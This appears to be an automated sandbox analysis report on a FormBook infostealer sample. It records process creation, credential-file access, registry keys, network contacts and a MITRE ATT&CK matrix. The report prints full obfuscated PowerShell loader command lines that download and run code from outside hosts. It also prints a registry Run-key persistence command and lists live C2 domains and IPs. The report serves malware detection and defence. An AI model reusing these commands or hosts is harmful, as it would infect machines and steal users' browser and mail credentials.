'ge$ovg
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "if (${host}.currentuiculture) {$alismataceae='substr';$lotah++;}$alismataceae+='ing';function viscometres($rubellosis){$overdaadigt=$rubellosis.length-$lotah;for( $dekanterendes=2;$dekanterendes -lt $overdaadigt;$dekanterendes+=3){$firblads159+=$rubellosis.$alismataceae.'invoke'( $dekanterendes, $lotah);}$firblads159;}function tilfredsstillelse($konerne){ . ($hemibasidiomycetes) ($konerne);}$annegretes=viscometres 'bumvio.lznyiefl,ilprapr/sn5te.fr0f ,l(gaw ti.anspds o,aw asfi h n atas z1,a0sy.ud0bi;bi tpw ,iopnv,6te4 c; r bix p6ud4ng; ,trunv ,: .1sk2,r1,l.di0va),n ,gpre .cskk og,/sm2fa0r.1ug0 .0ap1so0 r1ge vefs.isar destfrioraxku/ 1 p2,h1os. .0 , ';$milieuplanerne=viscometres 'youveslreterpr-w a,rgrhe,yn,ct.u ';$bageriers=viscometres 'enhfotant p l:re/.l/ilcn.p.oajuns.e lc.-sma ndd.m ,iopnt.h uopesf t e..fcu.okom.a/des ptn emevchnsts t1ta7 c9si.r myoiaux.o ';$arish=viscometres 'se>re ';$hemibasidiomycetes=viscometres 'amigeeprxud ';$svaerd='incisal';$dekanterendesndoneser = viscometres 'w,er,cexh eoch f %reainpcap dl ap,tu.amo%h.\chblie.olasi un sdtoade1ch0 .3 .xoetofint,t ,&co& s semec ehs.o,i gltuf ';tilfredsstillelse (viscometres 'me$.ig olbloedbgua.lld,:hisett mo ans.e er.foniolate = s(arctym.edwl m / rc u k$ ndd,e ,k gakanefti eoprt.e onoudhne.ostan,idpuo,on lekes ienurls),f ');tilfredsstillelse (viscometres 'ta$ovg klspokrbs aunl ,:jol ieh v de draneyed teresbo=i.$ kbzia vgreer,r,ei eepyr eshy.trst,perl.aitat,e( .$,oa .rraienssch o)ph ');tilfredsstillelse (viscometres 't,[jon lekrt.n.vas e ur v,oisic .ecap,co ki .nkntd,mfiacrn cavagase err ] e:de:,os eafchaufrrf ientprytaplirbeomet sopecm.o.il k es=m ,d[ onste .tsj. 
,safen,ckrut r tiuntcoysopskr aot t ohjc ao,glbotfiybrpq e.e] c:va:u.t ,ls.s f1,r2.r ');$bageriers=$leveredes[0];$varmeslangens= (viscometres 'cu$dig wl dop.bskaval :uilc.igeg eansinto,istl ml ii snsugfieb,r.nnf.e lsda=dinenep wan-wooskb tjb,eq,cm.t ps.ayhus nt.le smdi.hinchecotfo.nowexespb.mct,l tiemedin dt');$varmeslangens+=$stoneroot[1];tilfredsstillelse ($varmeslangens);tilfredsstillelse (viscometres 'or$ ol gi bgr,eg,szit cibrl.ul ,it.nmigklenorfonune s r.glhree dapeddie,orbls.f[af$kompaifeltri se ,u sp flora.unste fr,kn .e,a]go=me$mea bn,kn ,e pghir kegat defesje ');$mosegrundene=viscometres ' e$ .lk.i.rg sevus,etgii,olp lnei ,ngeg,oemyrlindrenas o.fld noalwinnsulhyokrau.dspfski pls ekr(kr$ ,bfua cgbnefirreiste,trhesbr,,r$ber kefoh ,ararlidine ,nfu) d ';$reharden=$stoneroot[0];tilfredsstillelse (viscometres ',e$ g .lmoo db ,aenl r: hfshu oshaitioean bs.dar,amer.te hndreno=vi(,ytwievrsf t - .p sa.mt mh s .o$svr mepuhbra orredspeunnre) a ');while (!$fusionsaarene) {tilfredsstillelse (viscometres 'af$.ogemlreo sbuna ,lls: inbrobon osbioprlreupeb.nlclyfr=c.$mitrarlau ek ') ;tilfredsstillelse $mosegrundene;tilfredsstillelse (viscometres 'uns tt ma.ir rt a- tspils etrefap v ,
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "if (${host}.currentuiculture) {$alismataceae='substr';$lotah++;}$alismataceae+='ing';function viscometres($rubellosis){$overdaadigt=$rubellosis.length-$lotah;for( $dekanterendes=2;$dekanterendes -lt $overdaadigt;$dekanterendes+=3){$firblads159+=$rubellosis.$alismataceae.'invoke'( $dekanterendes, $lotah);}$firblads159;}function tilfredsstillelse($konerne){ . ($hemibasidiomycetes) ($konerne);}$annegretes=viscometres 'bumvio.lznyiefl,ilprapr/sn5te.fr0f ,l(gaw ti.anspds o,aw asfi h n atas z1,a0sy.ud0bi;bi tpw ,iopnv,6te4 c; r bix p6ud4ng; ,trunv ,: .1sk2,r1,l.di0va),n ,gpre .cskk og,/sm2fa0r.1ug0 .0ap1so0 r1ge vefs.isar destfrioraxku/ 1 p2,h1os. .0 , ';$milieuplanerne=viscometres 'youveslreterpr-w a,rgrhe,yn,ct.u ';$bageriers=viscometres 'enhfotant p l:re/.l/ilcn.p.oajuns.e lc.-sma ndd.m ,iopnt.h uopesf t e..fcu.okom.a/des ptn emevchnsts t1ta7 c9si.r myoiaux.o ';$arish=viscometres 'se>re ';$hemibasidiomycetes=viscometres 'amigeeprxud ';$svaerd='incisal';$dekanterendesndoneser = viscometres 'w,er,cexh eoch f %reainpcap dl ap,tu.amo%h.\chblie.olasi un sdtoade1ch0 .3 .xoetofint,t ,&co& s semec ehs.o,i gltuf ';tilfredsstillelse (viscometres 'me$.ig olbloedbgua.lld,:hisett mo ans.e er.foniolate = s(arctym.edwl m / rc u k$ ndd,e ,k gakanefti eoprt.e onoudhne.ostan,idpuo,on lekes ienurls),f ');tilfredsstillelse (viscometres 'ta$ovg klspokrbs aunl ,:jol ieh v de draneyed teresbo=i.$ kbzia vgreer,r,ei eepyr eshy.trst,perl.aitat,e( .$,oa .rraienssch o)ph ');tilfredsstillelse (viscometres 't,[jon lekrt.n.vas e ur v,oisic .ecap,co ki .nkntd,mfiacrn cavagase err ] e:de:,os eafchaufrrf ientprytaplirbeomet sopecm.o.il k es=m ,d[ onste .tsj. 
,safen,ckrut r tiuntcoysopskr aot t ohjc ao,glbotfiybrpq e.e] c:va:u.t ,ls.s f1,r2.r ');$bageriers=$leveredes[0];$varmeslangens= (viscometres 'cu$dig wl dop.bskaval :uilc.igeg eansinto,istl ml ii snsugfieb,r.nnf.e lsda=dinenep wan-wooskb tjb,eq,cm.t ps.ayhus nt.le smdi.hinchecotfo.nowexespb.mct,l tiemedin dt');$varmeslangens+=$stoneroot[1];tilfredsstillelse ($varmeslangens);tilfredsstillelse (viscometres 'or$ ol gi bgr,eg,szit cibrl.ul ,it.nmigklenorfonune s r.glhree dapeddie,orbls.f[af$kompaifeltri se ,u sp flora.unste fr,kn .e,a]go=me$mea bn,kn ,e pghir kegat defesje ');$mosegrundene=viscometres ' e$ .lk.i.rg sevus,etgii,olp lnei ,ngeg,oemyrlindrenas o.fld noalwinnsulhyokrau.dspfski pls ekr(kr$ ,bfua cgbnefirreiste,trhesbr,,r$ber kefoh ,ararlidine ,nfu) d ';$reharden=$stoneroot[0];tilfredsstillelse (viscometres ',e$ g .lmoo db ,aenl r: hfshu oshaitioean bs.dar,amer.te hndreno=vi(,ytwievrsf t - .p sa.mt mh s .o$svr mepuhbra orredspeunnre) a ');while (!$fusionsaarene) {tilfredsstillelse (viscometres 'af$.ogemlreo sbuna ,lls: inbrobon osbioprlreupeb.nlclyfr=c.$mitrarlau ek ') ;tilfredsstillelse $mosegrundene;tilfredsstillelse (viscometres 'uns tt ma.ir rt a- tspils etrefap v ,
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "bilateralities" /t reg_expand_sz /d "%arrestationernes110% -w 1 $faucals83=(get-itemproperty -path 'hkcu:\sttyskers\').talevant;%arrestationernes110% ($faucals83)"
              Source: wab.exe, 0000000A.00000003.2228838836.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4221123486.0000000000B62000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager:0ws
              Source: wab.exe, 0000000A.00000003.2268500309.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4222010144.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2269959379.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
              Source: wab.exe, 0000000A.00000002.4244405887.0000000023F41000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2228838836.0000000000B63000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [2024/08/28 08:01:53 Program Manager]
              Source: wab.exe, 0000000A.00000002.4222010144.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager]J@)
              Source: wab.exe, 0000000A.00000002.4222010144.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerPJ=)Z&
              Source: wab.exe, 0000000A.00000002.4221123486.0000000000B62000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [2024/08/28 08:02:00 Program Manager]
              Source: wab.exe, 0000000A.00000002.4222010144.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager~J
              Source: wab.exe, 0000000A.00000002.4222010144.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerr|
              Source: wab.exe, 0000000A.00000002.4222010144.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerjJ3)
              Source: wab.exe, 0000000A.00000002.4244405887.0000000023F41000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4221123486.0000000000B62000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [2024/08/28 08:03:39 Program Manager]
              Source: wab.exe, 0000000A.00000003.2228838836.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4221123486.0000000000B62000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [%04i/%02i/%02i %02i:%02i:%02i Program Manager]
              Source: wab.exe, 0000000A.00000002.4222010144.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagertX@fn
              Source: wab.exe, 0000000A.00000002.4222010144.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerFJG)t$
              Source: wab.exe, 0000000A.00000002.4221123486.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4221949132.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4244405887.0000000023F2C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
              Source: wab.exe, 0000000A.00000002.4222010144.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager{J")
              Source: wab.exe, 0000000A.00000002.4222010144.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagertK
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_23D72933 cpuid 10_2_23D72933
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Program Files (x86)\Windows Mail\wab.exe  Code function: 10_2_23D72264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
              Source: C:\Program Files (x86)\Windows Mail\wab.exe  Code function: 18_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy
              Source: C:\Program Files (x86)\Windows Mail\wab.exe  Code function: 17_2_0041739B GetVersionExW
              Source: C:\Windows\SysWOW64\wscript.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              Source: Yara match  File source: 00000020.00000002.4221469550.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match  File source: 0000001A.00000002.2815202339.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match  File source: 00000020.00000002.4221200788.00000000033B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match  File source: 00000021.00000002.4222243357.00000000012D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match  File source: 00000020.00000002.4220745067.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match  File source: Process Memory Space: wab.exe PID: 7328, type: MEMORYSTR
              Source: Yara match  File source: C:\Users\user\AppData\Roaming\sfvnspt.dat, type: DROPPED
              Source: C:\Program Files (x86)\Windows Mail\wab.exe  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
              Source: C:\Windows\SysWOW64\relog.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
              Source: C:\Windows\SysWOW64\relog.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Windows\SysWOW64\relog.exe  File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Windows\SysWOW64\relog.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\relog.exe  File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\relog.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
              Source: C:\Program Files (x86)\Windows Mail\wab.exe  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Source: C:\Windows\SysWOW64\relog.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
              Source: C:\Program Files (x86)\Windows Mail\wab.exe  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
              Source: C:\Windows\SysWOW64\relog.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Program Files (x86)\Windows Mail\wab.exe  Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
              Source: C:\Program Files (x86)\Windows Mail\wab.exe  Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
              Source: C:\Program Files (x86)\Windows Mail\wab.exe  Key opened: HKEY_CURRENT_USER\Software\Paltalk
              Source: C:\Program Files (x86)\Windows Mail\wab.exe  Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
              Source: C:\Program Files (x86)\Windows Mail\wab.exe  Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
              Source: C:\Program Files (x86)\Windows Mail\wab.exe  Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Program Files (x86)\Windows Mail\wab.exe  Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
              Source: C:\Windows\SysWOW64\relog.exe  Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
              Source: C:\Program Files (x86)\Windows Mail\wab.exe  Code function: 18_2_004033F0 ESMTPPassword
              Source: C:\Program Files (x86)\Windows Mail\wab.exe  Code function: 18_2_00402DB3 _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword
              Source: C:\Program Files (x86)\Windows Mail\wab.exe  Code function: 18_2_00402DB3 _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword
              Source: Yara match  File source: Process Memory Space: wab.exe PID: 7328, type: MEMORYSTR
              Source: Yara match  File source: Process Memory Space: wab.exe PID: 7588, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara match  File source: 00000020.00000002.4221469550.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match  File source: 0000001A.00000002.2815202339.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match  File source: 00000020.00000002.4221200788.00000000033B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match  File source: 00000021.00000002.4222243357.00000000012D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match  File source: 00000020.00000002.4220745067.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match  File source: Process Memory Space: wab.exe PID: 7328, type: MEMORYSTR
              Source: Yara match  File source: C:\Users\user\AppData\Roaming\sfvnspt.dat, type: DROPPED
              MITRE ATT&CK Matrix (one row per line, cells separated by " | "; a number in front of a technique is the count the report shows beside that cell)

              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
              Gather Victim Identity Information | 112 Scripting | Valid Accounts | 1 Windows Management Instrumentation | 112 Scripting | 1 Abuse Elevation Control Mechanism | 11 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
              Credentials | Domains | Default Accounts | 11 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | 11 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
              Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | 11 Registry Run Keys / Startup Folder | 1 Access Token Manipulation | 2 Obfuscated Files or Information | 2 Credentials in Registry | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
              Employee Names | Virtual Private Server | Local Accounts | 312 Command and Scripting Interpreter | Login Hook | 412 Process Injection | 1 Software Packing | 1 Credentials In Files | 129 System Information Discovery | Distributed Component Object Model | 11 Input Capture | 15 Application Layer Protocol | Traffic Duplication | Data Destruction
              Gather Victim Network Information | Server | Cloud Accounts | 2 PowerShell | Network Logon Script | 11 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | LSA Secrets | 151 Security Software Discovery | SSH | 2 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
              Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 41 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
              DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Modify Registry | DCSync | 4 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
              Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 41 Virtualization/Sandbox Evasion | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
              Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Access Token Manipulation | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
              IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 412 Process Injection | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
              Behavior Graph ID: 1500456  Sample: PO_GM_list_2808202420200318...  Startdate: 28/08/2024  Architecture: WINDOWS  Score: 100

              Sample-wide network: iwarsut775laudrye2.duckdns.org (Uses dynamic DNS services); www.vendasnaweb1.com; 22 other IPs or domains
              Sample-wide signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Yara detected FormBook; 11 other signatures

              Process tree (indentation = parent/child; every child is "started" unless marked "injected"):
              cmd.exe
                signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Obfuscated command line found; Very long command line found
                powershell.exe
                  network: avocaldoperu.com 104.21.62.202, 443, 49730, 49737 CLOUDFLARENETUS United States
                  signatures: Suspicious powershell command line found; Obfuscated command line found; Very long command line found; Found suspicious powershell code related to unpacking or dynamic code loading
                  powershell.exe
                    signatures: Suspicious powershell command line found; Obfuscated command line found; Very long command line found; 2 other signatures
                    wab.exe
                      network: iwarsut775laudrye2.duckdns.org 172.111.137.132, 49738, 49739, 49740 SOFTLAYERUS United States; geoplugin.net 178.237.33.50, 49741, 80 ATOM86-ASATOM86NL Netherlands
                      dropped: C:\Users\user\AppData\Roaming\sfvnspt.dat (data); C:\Users\user\AppData\...\Andragendet8.vbs (ASCII)
                      signatures: Maps a DLL or memory area into another process; Installs a global keyboard hook
                      wscript.exe
                        signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Obfuscated command line found; 3 other signatures
                        powershell.exe
                          network: cpanel-adminhost.com 193.25.216.165, 49742, 49744, 80 LVLT-10753US Germany
                          signatures: Suspicious powershell command line found; Obfuscated command line found; Very long command line found
                          powershell.exe
                            signatures: Writes to foreign memory regions
                            wab.exe
                              signatures: Maps a DLL or memory area into another process
                              qeKrnFkDzDT.exe (injected)
                                signatures: Found direct / indirect Syscall (likely to bypass EDR)
                              cmd.exe
                                signatures: Uses cmd line tools excessively to alter registry or file data
                                conhost.exe
                            cmd.exe
                          conhost.exe
                          cmd.exe
                      cmd.exe
